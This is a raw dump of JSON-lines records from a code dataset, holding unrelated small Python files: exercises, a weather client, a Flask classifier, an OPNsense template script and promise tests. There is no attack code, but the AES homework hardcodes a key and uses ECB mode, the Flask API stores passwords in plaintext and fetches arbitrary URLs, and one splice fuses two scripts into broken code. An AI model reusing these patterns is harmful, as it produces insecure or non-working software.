print(len(list))\n\n\n\n\n \n","repo_name":"leechi2/LCL_WORLD","sub_path":"baekjoon/단계별/함수/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36781305430","text":"import sys\nfrom rec import *\nfrom rec_db import timestamp_interval_within_activity\n\n\ndef main():\n\n # parameters\n args = sys.argv\n u_iloc = int(args[1])\n\n # INIT\n md = MetaData()\n db = md.db_base_loader(['units', 'events', 'activity'])\n units, events, activity = db['units'], db['events'], db['activity']\n\n sm = SamplingMethod()\n\n unit_ind = units.iloc[u_iloc].name\n sess, _, _ = unit_ind\n events_slice = events.loc[events['Session'].eq(sess)]\n activity_collection = activity.loc[unit_ind]\n\n def event_within_activity(event_row):\n if np.isnan(event_row['StageDuration']):\n return False\n event_onset_point = SamplingPoint(sm, stamp=event_row['StageTimeIndex'])\n event_window = SamplingInterval(SamplingPoint(sm, t=0 * qu.ms),\n SamplingPoint(sm, t=event_row['StageDuration'] * qu.ms))\n event_fr_interval = SamplingInterval(event_onset_point, event_onset_point.copy()).get_offset(event_window)\n return timestamp_interval_within_activity(event_fr_interval.start.stamp, event_fr_interval.end.stamp,\n activity_collection)\n\n # for every event\n unit_mask = events_slice.apply(event_within_activity, axis=1)\n unit_events_list = unit_mask.loc[unit_mask].index\n\n # SAVE\n md.np_saver(unit_events_list,\n md.preproc_dest_path(path.join('temp', 'units_events',\n 'units_events_{0:s}_chan{1:03d}_unit{2:03d}.pkl'.format(*unit_ind))))\n\n\nmain()\n","repo_name":"pkollias/GatingInWorkingMemory","sub_path":"import_units_events_parse_unit.py","file_name":"import_units_events_parse_unit.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8035104539","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
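Editorial aside, not part of the dataset: `process_args()` in the Wielder record above overlays non-None command-line values onto a YAML-loaded dict and freezes the merge in a namedtuple. The core of that merge, with made-up values and no file I/O:

```python
# CLI-over-YAML merge in the style of process_args() above.
from collections import namedtuple

yaml_conf = {"plan": False, "env": "qe", "log_level": "INFO"}
cli_args = {"plan": None, "env": "prod", "log_level": None}

for k, v in cli_args.items():
    if v is not None:          # CLI wins only when explicitly given
        yaml_conf[k] = v

Conf = namedtuple("Conf", yaml_conf.keys())
conf = Conf(*yaml_conf.values())
print(conf.env)                # prod
```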
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom crashclouseau import update\n\n\nsched = BlockingScheduler(timezone=\"GMT\")\n\n\n@sched.scheduled_job(\"interval\", minutes=20)\ndef timed_job():\n    update.update_all()\n\n\nsched.start()\n","repo_name":"bxbrenden/crash-clouseau","sub_path":"bin/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"16669017397","text":"with open(\"/uploads/sample_input3.txt\") as file:\n    file.seek(0)\n    text = file.readlines()\n\ngoodies=[]\nprice=[]\nn=int(input('Number of employees: '))\nfor i in text:\n    temp=str(i).split(\":\")\n    goodies.append(temp[0])\n    price.append(int(str(temp[1]).strip().split('\\n')[0]))\n\nprint(goodies)\n\n\nfor i in range(len(price)):\n    for j in range(i+1,len(price)):\n        if price[j] 0:\n        \n        if guess_word == key:\n            print(\"Your answer is right!!\")\n            print(\"You won!!\")\n            print(\"\")\n            time.sleep(2)\n            loop_play()\n        \n        if guess_word != key:\n            turns = turns - 1\n            \n            if turns == 2:\n                print(\"Your answer is wrong\")\n                print(\"2 more guesses to enter right answer!!\")\n                print(\"\")\n                guess_word = input(\"Enter your answer: \")\n\n            if turns == 1:\n                print(\"Your answer is wrong\")\n                print(\"1 more guess to enter right answer!!\")\n                print(\"\")\n                guess_word = input(\"Enter your answer: \")\n\n            if turns == 0:\n                print(\"No more turns!! \\n You lost the game!!\") \n                print(f\"The correct answer is {key}\")\n                print(\"\")\n                time.sleep(1)\n                loop_play()\n\ndef loop_play():\n    answer = input(\"Do you want to play again? \\n Type Yes to continue and No to exit: \")\n    if answer == \"Yes\":\n        print(\"\")\n        wmk()\n    elif answer == \"No\":\n        print(\"We hope to see you again soon!! \\n Thanks for playing!!\")\n        time.sleep(2)\n        quit()\n    else:\n        print(\"\")\n        print(\"Enter the valid response (Yes or No).\")\n        loop_play()\n\nname = input(\"Enter your name: \")\nprint(\"Welcome to the game!!!\")\nprint(\"You have 3 chances to guess the right word according to the definition\")\nprint(\"\")\nwmk()","repo_name":"avreetkaur84/Guessword_game","sub_path":"Random.py","file_name":"Random.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38548761859","text":"import socket, os, time, sys\nfrom Crypto.Cipher import AES\n\ntext_to_send = \"\"\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam et feugiat odio. Nullam vitae ante at erat porta rutrum et at mi. Vestibulum nisl orci, lobortis nec arcu quis, pulvinar tristique elit. Praesent facilisis ut nisi quis mattis. Ut quam nibh, lobortis quis ligula vel, rutrum pellentesque risus. In consequat, enim eget laoreet tempor, nibh tellus mollis tortor, nec laoreet ex neque ac mauris. Nullam laoreet at ex eu luctus. Integer tempor euismod ultricies. Vestibulum vitae sagittis massa. Sed ipsum libero, facilisis in mi sit amet, mollis lacinia enim. Aenean et aliquet massa.\"\"\"\n\ndef encrypt_and_return_key(key):\n    enc = AES.new(b'sixteen byte key', AES.MODE_ECB)  # ECB mode takes no IV\n    return enc.encrypt(key)\n\nif len(sys.argv) < 2:\n    print('Usage: ./sender.py mode (mode in [\\'ecb\\', \\'cfb\\']).')\n    exit(0)\n\nif sys.argv[1] not in ['ecb', 'cfb']:\n    print('Incorrect encryption standard. 
Must be either \\'ecb\\' or \\'cfb\\'.')\n exit(0)\n\nkey = os.urandom(16)\naes = AES.new(key, AES.MODE_ECB, os.urandom(16))\n\nr = socket.socket()\nport = 8080\nr.connect(('127.0.0.1', port))\n\n# initial handshake\nr.send(sys.argv[1].encode())\nresponse = r.recv(2).decode()\nif response == 'no':\n print('Negative response received after communicating encryption mode. Exiting...')\n exit(0)\nr.send(encrypt_and_return_key(key))\n\nif sys.argv[1] == 'ecb':\n for i in range(0, len(text_to_send), 16):\n plaintext = text_to_send[i:min(len(text_to_send), i + 16)]\n while len(plaintext) < 16: plaintext += \" \"\n r.send(aes.encrypt(plaintext))\nelif sys.argv[1] == 'cfb':\n iv = b'sixteen byte iv '\n for i in range(0, len(text_to_send), 16):\n plaintext = text_to_send[i:min(len(text_to_send), i + 16)]\n while len(plaintext) < 16: plaintext += \" \"\n\n # encrypt the iv\n enc_iv = aes.encrypt(iv)\n\n # xor with the plaintext and send\n cyphertext = bytes([(a ^ b) for a, b in zip(plaintext.encode(), enc_iv)])\n r.send(cyphertext)\n\n # updating the iv\n iv = cyphertext\nelse:\n pass\n\nr.close()\n","repo_name":"theodor-vlad/SI-HW","sub_path":"tema1/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25414524640","text":"from math import pi\r\n\r\n# Location of the antenna and altitude above sea level\r\nLAT = 45.276055\r\nLON = 13.721878\r\nALTITUDE = 226\r\n\r\n# Steps in a rotation\r\nSTEPS_PER_ROT = 660000\r\n\r\n# Transmission ratio stepsperrev/200\r\nTRANSMISSION_RATIO = STEPS_PER_ROT / 200\r\n\r\n# Steps of the SM per 1 degree rotation on the output shaft\r\nSTEPS_PER_DEG = int(STEPS_PER_ROT / 360)\r\n\r\n# Inverse of the above, used to update the pointing after every step of a SM\r\nDEG_PER_STEP = 1/STEPS_PER_DEG\r\n\r\n# Used to convert angles from radians to degrees\r\nRAD_TO_DEG_FACTOR = 180 / pi\r\n\r\n# Time in seconds that the program sleeps for after every step of a SM (no sleep time causes the motor to skip steps)\r\nSLEEP_TIME = 0.001\r\n\r\n# Rotation rate of the earth in degrees/second\r\nDEG_PER_SECOND = 1/240\r\n\r\n# Frequency (in seconds) of updating the position in console\r\nPRINT_FREQ = 1\r\n\r\n# Absolute RA SM position when in home position\r\nHA_HOME_ABS_POSITION = int(STEPS_PER_ROT * (1/4))\r\n\r\n# Hour angle when in home position\r\nHOME_HA = 270 + 2.73\r\n\r\n# Absolute Dec SM position when in home position\r\nDEC_HOME_ABS_POSITION = STEPS_PER_ROT / 2\r\n\r\n# Declination when in home positon\r\nHOME_DEC = -45\r\n\r\n# Main menu output\r\nMENU_STRING = '===== eCALLISTO Master v1.0 =====\\nt = track sun\\nh = home\\ngoto = GoTo\\nm = manual control (RA and Dec)\\ncoords = print current coords\\n>>> '","repo_name":"jakovsch/callisto","sub_path":"rotator/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4251119290","text":"from pathlib import Path\nimport requests\nimport json\nimport sys\nimport time\nfrom time import gmtime, strftime\n\n'''TODO\n- Compare places\n- Weather for specific date\n'''\n\n\n'''Default values'''\nheaders = {'User-Agent':'jesperdahl@hotmail.no'}\nplace = 'Oslo'\ndebug = 
False\n\n#https://developer.yr.no/doc/StatusCodes/\n#https://developer.yr.no/doc/locationforecast/HowTO/\n#https://developer.yr.no/doc/GettingStarted/\n#https://developer.yr.no/doc/ForecastJSON/\n\n#https://nominatim.openstreetmap.org/search.php?q=oslo&format=jsonv2\n#https://api.met.no/weatherapi/locationforecast/2.0/compact?lat=59&lon=10\n\nargs = sys.argv\n\nif len(args) == 2:\n    place = args[1]\nif len(args) == 3:\n    place = args[1]\n    debug = True if args[2] == '-d' else False\n\n\n'''Request and processing for lat/lon'''\ndef request_nomatim(place):\n    try:\n        base_url = f'https://nominatim.openstreetmap.org/search.php?q={place}&format=jsonv2'\n        response = requests.get(base_url, headers={'User-Agent': 'jesperdahl@hotmail.no'})\n    except:\n        print(f\"An error occurred, could not access {base_url}\")\n    return response.json()\n\ndef parse_coord(response) -> list:\n    return [float(response[0]['lat']), float(response[0]['lon'])]\n\ndef current_time():\n    return time.strftime('%a, %d %b %Y %H:%M:%S %Z', time.gmtime())\n\ndef write_meta_data(response):\n    last_modified = response.headers['Last-Modified']\n    expires = response.headers['Expires']\n\n    metadata = {\n        'place':place,\n        'expires':expires,\n        'last_modified':last_modified\n    }\n    metadata_json = json.dumps(metadata, indent=4)\n    with open('metadata.json', 'w') as out_meta:\n        out_meta.write(metadata_json)\n\ndef write_weather_data(data):\n    weather_json_data = json.dumps(data, indent=4)\n\n    with open(\"weather_data.json\", 'w') as outfile:\n        outfile.write(weather_json_data)\n\ndef direction(deg):\n    dirs = ['N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW']\n    ix = round(deg / (360. / len(dirs)))\n    return dirs[ix % len(dirs)]\n\n\ndef handle_met_request(lat,lon):\n    meta_exists = False\n    is_modified = False\n    last_modified = \"\"\n    expires = \"\"\n\n    if debug:\n        print(\"Search coords:\", lat, lon)\n    lat = float(lat)\n    lon = float(lon)\n\n    meta_file = Path('metadata.json')\n    if meta_file.is_file():\n        meta_exists = True\n\n    if not meta_exists:\n        if debug:\n            print(\"No previous forecast found, creating new metadata and weatherdata\")\n\n\n        met_response = met_request(lat,lon,is_modified, last_modified)\n\n        if met_response.status_code != 200:\n            print(\"Program exited with code\", met_response.status_code)\n            exit()\n        \n        write_meta_data(met_response)\n        write_weather_data(met_response.json())\n\n        return met_response.json()\n\n    with open('metadata.json', 'r') as meta_in:\n        metadata = json.load(meta_in)\n        expires = metadata['expires']\n        last_modified = metadata['last_modified']\n        meta_place = metadata['place']\n\n    if debug:\n        print(f\"Metadata found for place {meta_place}: \\n Prev. 
Data expires: {expires}\\n Last modified: {last_modified}\")\n    \n    \n\n    if meta_place != place:\n        met_response = met_request(lat,lon,is_modified,last_modified)\n        write_meta_data(met_response)\n        write_weather_data(met_response.json())\n        return met_response.json()\n\n    time = current_time()\n    if time > expires:\n        if debug:\n            print(time)\n            print(\"Weather data expired, requesting...\")\n\n\n        is_modified = True\n        met_response = met_request(lat,lon,is_modified,last_modified)\n        \n        if met_response.status_code == 304:\n            if debug:\n                print(\"Data not modified, using stored data\")\n            \n\n            with open('weather_data.json', 'r') as weather_in:\n                weather_data = json.load(weather_in)\n            return weather_data\n        \n        write_meta_data(met_response)\n        write_weather_data(met_response.json())\n        return met_response.json()\n\n    if debug:\n        print(\"Weather data not expired, using stored data\")\n\n    with open('weather_data.json', 'r') as weather_in:\n        weather_data = json.load(weather_in)\n    return weather_data\n\n\ndef show_forecast(response):\n    updated_at = response['properties']['meta']['updated_at']\n    temp_unit = response['properties']['meta']['units']['air_temperature']\n\n    time = response['properties']['timeseries'][0]['time']\n    air_temp = response['properties']['timeseries'][0]['data']['instant']['details']['air_temperature']\n    wind_direction = response['properties']['timeseries'][0]['data']['instant']['details']['wind_from_direction']\n    wind_speed = response['properties']['timeseries'][0]['data']['instant']['details']['wind_speed']\n    \n    next_1_hour = {\n        #'rain': response['properties']['timeseries'][0]['data']['next_1_hour']['details']['precipitation_amount']\n    }\n\n    \n    print(f\"\\n~~~~~~~~ Weather for {place} at {time} ~~~~~~~~\")\n    print(f\"| Updated at {updated_at}\\n|\")\n    print(f\"| - {air_temp} degrees {temp_unit}\\n| - Wind speed {wind_speed} m/s\")\n    print(f\"| - Wind direction {direction(wind_direction)}\")\n\n\n\n''' @lat latitude float\n    @lon longitude float\n    @is_modified boolean if modified since last request\n    @modified timestamp \n'''\ndef met_request(lat, lon, is_modified, modified):\n    try:\n        base_url = f'https://api.met.no/weatherapi/locationforecast/2.0/compact?lat={lat:.2f}&lon={lon:.2f}'\n        if is_modified:\n            response = requests.get(base_url, headers={'User-Agent': 'jesperdn@hotmail.no', 'If-Modified-Since':modified})\n        else:\n            response = requests.get(base_url, headers={'User-Agent': 'jesperdn@hotmail.no'})\n    except:\n        print(f\"An error occurred, could not access {base_url}\")\n    return response\n\n\ndef main():\n    nomatim_response = request_nomatim(place)\n    coords = parse_coord(nomatim_response)\n    met_response = handle_met_request(coords[0], coords[1])\n    show_forecast(met_response)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Jesperdn/Forecast","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73100155752","text":"import time\nimport numpy as np\nfrom numpy_ringbuffer import RingBuffer\nfrom asi import ASICamera\n\n\ndef frame_rate_test(camera, n=100):\n    start_time = time.monotonic()\n    camera.start_video_capture()\n    #image_array = RingBuffer(capacity=10, dtype=(np.uint16, 3672, 5496))\n    image_array = []\n    for i in range(n):\n        image = camera.get_video_data()\n        #Start Brint's code\n        if image is not None:\n            #do stuff\n            image_array.append(image)\n            diff = image_array[0] - image\n            \n    \n    end_time = time.monotonic()\n    camera.stop_video_capture()\n    fps 
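Editorial aside, not part of the dataset: the weather client above revalidates its cache with an `If-Modified-Since` header and treats HTTP 304 as "reuse stored data". The same pattern as a generic helper; the function name is made up and no real URL is assumed:

```python
# Conditional GET with a local cache, in the style of handle_met_request() above.
import requests

def fetch_with_cache(url, cached_body=None, last_modified=None):
    headers = {"User-Agent": "example-client"}
    if cached_body is not None and last_modified:
        headers["If-Modified-Since"] = last_modified
    response = requests.get(url, headers=headers)
    if response.status_code == 304:
        return cached_body, last_modified          # cache still valid, no new body
    response.raise_for_status()
    return response.text, response.headers.get("Last-Modified")
```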
= n / (end_time - start_time)\n    msg = \"Got {} frames in {} seconds ({} fps).\".format(n, (end_time - start_time), fps)\n    print(msg)\n    return fps\n\n\nif __name__ == '__main__':\n    camera = ASICamera(library_path='/usr/local/lib/libASICamera2.so')\n    frame_rate_test(camera, n=1000)\n","repo_name":"AnthonyHorton/fast-zwo","sub_path":"video_test.py","file_name":"video_test.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42094474977","text":"def nok(a,b):\r\n    m = a*b #Find the GCD using Euclid's algorithm\r\n    while a != 0 and b != 0:\r\n        if a > b:\r\n            a %= b\r\n        else:\r\n            b %= a\r\n    nod = a + b\r\n    nok = m//nod\r\n    return nok # we could just as well write print(nok) here and call nok(a,b) on line 16; it would work the same\r\n\r\nwhile True:\r\n    try:\r\n        a = abs(int(input(\"Enter the first number\"))) # Take the absolute value so we can compute the LCM of negative numbers.\r\n        b = abs(int(input(\"Enter the second number\")))\r\n        print(nok(a,b))\r\n    except ValueError:\r\n        print('You must enter digits')\r\n        continue\r\n","repo_name":"Pasha-lt/ITEA","sub_path":"lesson03/hw_3_2.py","file_name":"hw_3_2.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28817635748","text":"from flask import (\n    Flask,\n    jsonify,\n    request\n)\n\nfrom pymongo import MongoClient\nimport subprocess\nimport json\nimport requests\n\napp = Flask(__name__)\nclient = MongoClient('localhost', 27017)\ndb = client['imageclassification']\nImage = db['Images']\n\n@app.route('/')\ndef index():\n    return 'ok'\n\n@app.route('/register', methods=['POST'])\ndef register():\n    data = request.get_json()\n\n    res = Image.insert_one({\n        'username': data['username'],\n        'password': data['password'],\n        'toke_amount': 5\n    })\n\n    return jsonify({\n        'success': True,\n    })\n\n@app.route('/classify')\ndef classify():\n    data = request.get_json()\n    url = data['url']\n\n    r = requests.get(url)\n    ret = {}\n    with open(\"temp.jpg\", \"wb\") as f:\n        f.write(r.content)\n    proc = subprocess.Popen('python classify_image.py --image_file=temp.jpg', shell=True)\n    proc.communicate()[0]\n    proc.wait()\n    with open('text.txt') as g:\n        ret = json.load(g)\n    \n    return jsonify(ret)\n\nif __name__ == \"__main__\":\n    app.run()","repo_name":"timmyyeh/Flask-Apis","sub_path":"image_classification/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2344234689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 8 15:57:18 2022\n\n@author: tdewacher\n\"\"\"\n\nimport numpy as np\nfrom scipy.ndimage import rotate\nimport os\nfrom astropy.io import fits\nfrom matplotlib.colors import PowerNorm\nimport matplotlib.pyplot as plt\n\ndef crop(img,amount):\n    '''\n    Crops the given image by a given amount of pixels in every direction\n\n    Parameters\n    ----------\n    img : 2D array\n    amount : int\n\n    Returns\n    -------\n    cropped : 2D array\n\n    '''\n    dx,dy = np.shape(img)\n    cropped = img[amount:dx-amount,amount:dy-amount]\n    return cropped\n\ndef align_rotation(ald,bet):\n    '''\n    Rotates the picture of Aldebaran in order to align it with Betelgeuse and saves it to a fits\n\n    Parameters\n    ----------\n    ald : str\n        Path to the PSF of Aldebaran.\n    bet : str\n        Path to the corresponding Betelgeuse image.\n\n    '''\n    \n    # Getting images and hdrs\n    with fits.open(ald) as hdul:\n        
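Editorial aside, not part of the dataset: the `nok()` record above computes the LCM via the identity lcm(a, b) = a*b / gcd(a, b), with the GCD found by Euclid's algorithm. The same result via the standard library, useful for cross-checking:

```python
# Standard-library LCM, matching the hand-rolled nok() above.
import math

def lcm(a, b):
    a, b = abs(a), abs(b)           # LCM is taken on magnitudes here, as nok() does
    return a * b // math.gcd(a, b) if a and b else 0

print(lcm(12, 18))   # 36, matching nok(12, 18)
```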
img_ald = hdul[0].data\n hdr_ald = hdul[0].header\n with fits.open(bet) as hdul:\n img_bet = hdul[0].data\n hdr_bet = hdul[0].header\n \n # Getting the angle\n alpha = -(hdr_bet[\"HIERARCH ESO TEL PARANG START\"] - hdr_ald[\"HIERARCH ESO TEL PARANG START\"])\n rotated = rotate(img_ald,alpha,reshape=False)\n \n # Crop image\n i = 1\n while len(rotated[rotated == 0]) != 0:\n rotated = crop(rotated,i)\n \n # Saving the rotated image\n hdul = fits.PrimaryHDU(rotated,hdr_ald)\n hdul.writeto(ald.replace(\"true\",\"rot\"),overwrite=True,output_verify=\"silentfix\")\n return\n","repo_name":"TimEpsilon/Lucky-imaging","sub_path":"RotateImage.py","file_name":"RotateImage.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10623185730","text":"import os\nimport sys\nimport ujson\nimport binascii\nimport zipfile\nimport base64\nfrom io import BytesIO\nfrom lib import OPNsenseConfig\n\nresponse = dict()\nsource_directory = '/usr/local/opnsense/scripts/OPNsense/CaptivePortal/htdocs_default'\n\noutput_data = BytesIO()\n\nwith zipfile.ZipFile(output_data, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:\n # overlay user template data\n user_filenames = list()\n if len(sys.argv) > 1:\n # Search for user template, using fileid\n # In this case, we must use the config.xml to retrieve the latest content.\n # When using the generated config, the user experience will be a bit odd (old content after upload)\n cnf = OPNsenseConfig()\n template_content = cnf.get_template(sys.argv[1])\n if template_content is not None:\n try:\n input_data = BytesIO(base64.b64decode(template_content))\n with zipfile.ZipFile(input_data, mode='r', compression=zipfile.ZIP_DEFLATED) as zf_in:\n for zf_info in zf_in.infolist():\n user_filenames.append(zf_info.filename)\n zf.writestr(zf_info.filename, zf_in.read(zf_info.filename))\n except zipfile.BadZipfile:\n # not in zip format\n response['error'] = 'internal xml data not in zip format, user data discarded'\n except binascii.Error:\n # not base64 encoded\n response['error'] = 'internal xml data not in base64 format, user data discarded'\n\n # read standard template from disk\n for root, dirs, files in os.walk(source_directory):\n for filename in files:\n filename = '%s/%s' % (root, filename)\n output_filename = filename[len(source_directory)+1:]\n if output_filename not in user_filenames:\n tmp = open(filename, 'rb').read()\n zf.writestr(output_filename, tmp)\n\nresponse['payload'] = base64.b64encode(output_data.getvalue()).decode()\nresponse['size'] = len(response['payload'])\nprint(ujson.dumps(response))\n","repo_name":"opnsense/core","sub_path":"src/opnsense/scripts/OPNsense/CaptivePortal/fetch_template.py","file_name":"fetch_template.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":2702,"dataset":"github-code","pt":"72"} +{"seq_id":"1552417135","text":"from unittest.mock import Mock\n\nimport pytest\n\nfrom redun.promise import Promise, wait_promises\n\n\ndef test_resolve() -> None:\n \"\"\"\n Promise constructor should resolve values.\n \"\"\"\n promise: Promise[int] = Promise(lambda resolve, reject: resolve(10))\n assert promise.value == 10\n\n\ndef test_reject() -> None:\n \"\"\"\n Promise constructor should reject exceptions.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise(lambda resolve, reject: reject(error))\n assert promise.error == error\n\n\ndef test_do_resolve() -> None:\n \"\"\"\n 
Promises should resolve values after instantiation.\n \"\"\"\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n assert promise.value == 10\n\n\ndef test_do_reject() -> None:\n \"\"\"\n Promises should reject exceptions after instantiation.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise()\n promise.do_reject(error)\n assert promise.error == error\n\n\ndef test_resolve_first() -> None:\n \"\"\"\n First resolution counts.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n promise.do_resolve(20)\n promise.do_reject(error)\n assert promise.value == 10\n\n\ndef test_resolved_has_no_error() -> None:\n \"\"\"\n Once resolved, promise is marked as not rejected.\n \"\"\"\n error = ValueError(\"boom\")\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n promise.do_reject(error)\n assert promise.value == 10\n with pytest.raises(ValueError):\n promise.error\n\n\ndef test_reject_first() -> None:\n \"\"\"\n First rejection counts.\n \"\"\"\n error = ValueError(\"boom\")\n error2 = ValueError(\"boom2\")\n promise: Promise[int] = Promise()\n promise.do_reject(error)\n promise.do_reject(error2)\n promise.do_resolve(10)\n promise.do_resolve(20)\n assert promise.error == error\n\n\ndef test_then_resolve() -> None:\n \"\"\"\n Promise resolutions should propagate through then().\n \"\"\"\n mock = Mock()\n promise: Promise[int] = Promise()\n promise.then(mock)\n promise.do_resolve(10)\n mock.assert_called_with(10)\n\n\ndef test_then_reject() -> None:\n \"\"\"\n Promise rejections should propagate through then().\n \"\"\"\n\n def fail(error):\n pass\n\n mock = Mock(fail)\n promise: Promise[int] = Promise()\n promise.then(None, mock)\n\n error = ValueError(\"boom\")\n promise.do_reject(error)\n mock.assert_called_with(error)\n\n\ndef test_resolve_then() -> None:\n \"\"\"\n Already resolved promises should still propagate through then().\n \"\"\"\n promise: Promise[int] = Promise()\n promise.do_resolve(10)\n\n mock = Mock()\n promise.then(mock)\n mock.assert_called_with(10)\n\n\ndef test_reject_then() -> None:\n \"\"\"\n Already rejected promises should still propagate through then().\n \"\"\"\n promise: Promise[int] = Promise()\n error = ValueError(\"boom\")\n promise.do_reject(error)\n\n mock = Mock()\n promise.then(None, mock)\n mock.assert_called_with(error)\n\n\ndef test_resolve_multiple_then() -> None:\n \"\"\"\n Resolutions should fan-out to multiple `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(mock)\n mock2 = Mock()\n promise.then(mock2)\n\n promise.do_resolve(10)\n mock.assert_called_with(10)\n mock2.assert_called_with(10)\n\n\ndef test_reject_multiple_then() -> None:\n \"\"\"\n Rejections should fan-out through multiple `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(None, mock)\n mock2 = Mock()\n promise.then(None, mock2)\n\n error = ValueError(\"boom\")\n promise.do_reject(error)\n mock.assert_called_with(error)\n mock2.assert_called_with(error)\n\n\ndef test_chain_resolve() -> None:\n \"\"\"\n Resolutions should propagate through chained `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(lambda x: x + 1).then(lambda x: x + 2).then(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(13)\n\n\ndef test_chain_reject() -> None:\n \"\"\"\n Rejections should propagate through chained `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n 
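Editorial aside, not part of the dataset: the redun test suite in this record pins down synchronous Promise semantics: `then()` chaining, pass-through on empty handlers, and raising inside a handler rejecting the chain. A toy already-settled promise mirroring those behaviours (this is not redun's implementation):

```python
# Minimal settled-promise sketch matching the chaining behaviour tested above.
class TinyPromise:
    def __init__(self, value=None, error=None):
        self.value, self.error = value, error

    def then(self, on_ok=None, on_err=None):
        if self.error is not None:
            if on_err is None:
                return TinyPromise(error=self.error)   # rejection propagates
            return TinyPromise(value=on_err(self.error))
        if on_ok is None:
            return TinyPromise(value=self.value)       # empty then() passes through
        try:
            return TinyPromise(value=on_ok(self.value))
        except Exception as exc:
            return TinyPromise(error=exc)              # raising rejects the chain

print(TinyPromise(value=10).then(lambda x: x + 1).then(lambda x: x + 2).value)  # 13
```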
promise.then(lambda x: x + 1).then(None, mock)\n\n error = ValueError(\"boom\")\n promise.do_reject(error)\n mock.assert_called_with(error)\n\n\ndef test_chain_null() -> None:\n \"\"\"\n Resolutions should propagate through empty `then()` calls.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then().then(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(10)\n\n\ndef test_nest_resolve() -> None:\n \"\"\"\n Resolutions of nested promises should propagate.\n \"\"\"\n promise: Promise[int] = Promise()\n\n mock = Mock()\n promise.then(lambda x: Promise(lambda resolve, reject: resolve(x + 1))).then(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(11)\n\n\ndef test_nest_reject() -> None:\n \"\"\"\n Rejections of nested promises should propagate.\n \"\"\"\n promise: Promise[int] = Promise()\n\n error = ValueError(\"boom\")\n mock = Mock()\n promise.then(lambda x: Promise(lambda resolve, reject: reject(error))).catch(mock)\n\n promise.do_resolve(10)\n mock.assert_called_with(error)\n\n\ndef test_raise() -> None:\n \"\"\"\n Raising an exception should reject the Promise.\n \"\"\"\n error = ValueError(\"boom\")\n\n def then(result: int) -> None:\n raise error\n\n def fail(error: Exception) -> int:\n return 100\n\n def final(result: int) -> None:\n pass\n\n promise: Promise[int] = Promise()\n\n mock = Mock(side_effect=fail)\n mock2 = Mock(side_effect=final)\n promise.then(then).catch(mock).then(mock2)\n\n promise.do_resolve(10)\n mock.assert_called_with(error)\n mock2.assert_called_with(100)\n\n\ndef test_all() -> None:\n \"\"\"\n Promise.all() should resolve when all child promises resolve.\n \"\"\"\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(mock)\n\n promise1.do_resolve(1)\n promise2.do_resolve(2)\n mock.assert_called_with([1, 2])\n\n\ndef test_all_first() -> None:\n \"\"\"\n Promise.all() should resolve even when all child promises resolve first.\n \"\"\"\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n promise1.do_resolve(1)\n promise2.do_resolve(2)\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(mock)\n\n mock.assert_called_with([1, 2])\n\n\ndef test_all_reject() -> None:\n \"\"\"\n Promise.all() should reject when any child promise rejects.\n \"\"\"\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n\n promises = 